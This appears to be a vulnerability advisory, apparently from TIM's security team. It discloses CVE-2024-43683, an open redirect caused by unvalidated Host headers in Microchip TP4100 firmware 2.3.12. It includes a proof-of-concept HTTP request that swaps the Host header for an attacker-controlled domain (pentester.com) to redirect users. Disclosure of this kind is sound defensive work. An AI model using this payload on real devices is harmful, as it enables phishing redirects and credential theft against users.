La Sostenibilità per TIM

Il Report 2024 accoglie i principi della Corporate Sustainability Reporting Directive (CSRD) ed è incluso nella Relazione Finanziaria e di Sostenibilità. Approfondisci

Ultimi Comunicati Stampa

Redazione ufficio stampa

Leggi gli ultimi comunicati stampa e naviga nell'archivio dell'Ufficio Stampa del Gruppo TIM. Leggi i comunicati

CVE-2024-43683

CVE-2024-43683 – Microchip TP4100

Vulnerability Description: URL Redirection to Untrusted Site ('Open Redirect') – CWE-601

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43683

CVSS: 6.1

Severity: Medium

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

The device does not properly verify the "Host" header field contained in GET/POST requests. In the attached evidences, the legit 'Host' field is replaced with the public name of another host (in this case pentester.com) and the requests are accepted by the device that redirect to malicious page.

 

Step-by-step instructions and PoC

Without validation of header Host is possible to redirect a user to malicious website owned by the attacker.

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

 

GET /dashboard HTTP/1.1

Host: pentester.com

Cache-Control: max-age=0

Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"

Sec-Ch-Ua-Mobile: ?0

Sec-Ch-Ua-Platform: "Linux"

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.9

Priority: u=0, i

Connection: close

 

In the following picture the header host is modified with a domain owned by the attacker (i.e. pentester.com) and the device redirect the user to the website. 

Figure 20: URL Redirection to Untrusted Site

Click To Enlarge

Security Impact

A user could be redirected to malicious website and the attacker could steal sensitive information such user credentials.